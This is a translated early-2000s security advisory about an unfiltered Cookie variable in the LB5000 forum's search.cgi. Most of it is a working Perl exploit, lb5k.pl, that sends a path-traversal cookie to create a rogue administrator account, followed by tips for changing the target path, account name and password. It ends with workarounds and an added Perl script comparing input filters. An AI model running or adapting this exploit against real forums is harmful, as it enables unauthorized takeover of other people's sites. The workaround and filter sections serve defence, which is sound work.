LB5000: the LB5K attack program lb5k.pl for the unfiltered Cookie variable vulnerability, and a temporary workaround

/ns/ld/softld/data/20011103002303.htm

#!/usr/bin/perl
#Proof of Concept
#LB5K search.cgi exploit
#Codz by analysist <analysist@nsfocus.com>

use Socket;

$ARGC = @ARGV;
if ($ARGC != 2) {
print "Usage: $0 <host> <port>\n";
exit(1);
}

$host = shift;
$port = shift;

#you may need to change it?
$user = "admin";

$req = "GET /LB5000/cgi-bin/search.cgi?action=startsearch&CUR_TIME=$user%5fsch%09c40p%09member%09ad&SEARCH_STRING=i&NAME_SEARCH=really&TYPE_OF_SEARCH=love&POST_SEARCH=analysist&FORUMS_TO_SEARCH=:) HTTP/1.1\r\n".
"Host: $host\r\n".
"Accept: */*\r\n".
"Cookie: amembernamecookie=../members/$user\n\n";

@res = sendraw($req);

if ($res[0] =~ /HTTP\/1\.1 200 OK/ig) {
print "Ok,创建管理员帐号".$user."_sch成功!\n";
}

#modified from rfp's script!:)
sub sendraw {
my ($req) = @_;
my $target;
$target = inet_aton($host) || die("inet_aton problems");
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,$port,$target)){
select(S);
$| = 1;
print $req;
my @res = <S>;
select(STDOUT);
close(S);
return @res;
}
else {
die("Can't connect...\n");
}
}
The path setting can be changed to match the LB forum server's path:
GET /LB5000/cgi-bin/search.cgi?
The registered name admin can also be changed:
$user = "admin";
The password c40p can also be changed:
09c40p%09member%
Install a Perl interpreter on Windows.
First register a name so that a cookie is left in IE, so that the .pl script can carry out the attack.



Temporary workarounds:
1. Temporary workaround for the Cookie problem:
Before line 60, $filename = $inmembername;, add the following two lines:
$inmembername =~ s/\///g;
$inmembername =~ s/\.\.//g;
2. It is recommended to filter every variable that is written to a file.
3. Stop using search.cgi for now (delete it or change its permissions to 666).
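As an added example (not code from the advisory or from LB5000 itself), the following Perl script runs the advisory's two substitutions and a stricter allowlist check over a few constructed cookie values, including the amembernamecookie value that lb5k.pl sends; the allowlist pattern and the 32-character limit are my suggestion, not something the advisory specifies.

```perl
#!/usr/bin/perl
# Added example (not from the advisory or from LB5000): compares the
# advisory's two-line workaround with a stricter allowlist check.
use strict;
use warnings;

# The advisory's workaround, meant to run before "$filename = $inmembername;".
sub filter_advisory {
    my ($inmembername) = @_;
    $inmembername =~ s/\///g;    # drop every "/"
    $inmembername =~ s/\.\.//g;  # drop every ".."
    return $inmembername;
}

# Stricter alternative (my suggestion, not from the advisory): accept only a
# short member name of letters, digits and "_", and reject anything else so
# the CGI never builds a file name from an untrusted value.
sub filter_allowlist {
    my ($inmembername) = @_;
    return undef unless defined $inmembername
        && $inmembername =~ /\A[A-Za-z0-9_]{1,32}\z/;
    return $inmembername;
}

# Constructed cookie values for the comparison.
my @cookies = (
    'analysist',          # an ordinary member name
    '../members/admin',   # the amembernamecookie value sent by lb5k.pl
    'a.b',                # passes the workaround unchanged, rejected by the allowlist
    '',                   # empty cookie
);

for my $c (@cookies) {
    my $work  = filter_advisory($c);
    my $allow = filter_allowlist($c);
    printf "%-20s workaround=%-16s allowlist=%s\n",
        "'$c'", "'$work'", defined $allow ? "'$allow'" : 'REJECTED';
}
```

The workaround turns the lb5k.pl value into a plain name, while the allowlist rejects it outright, which is the safer response for a value that is later used as a file name.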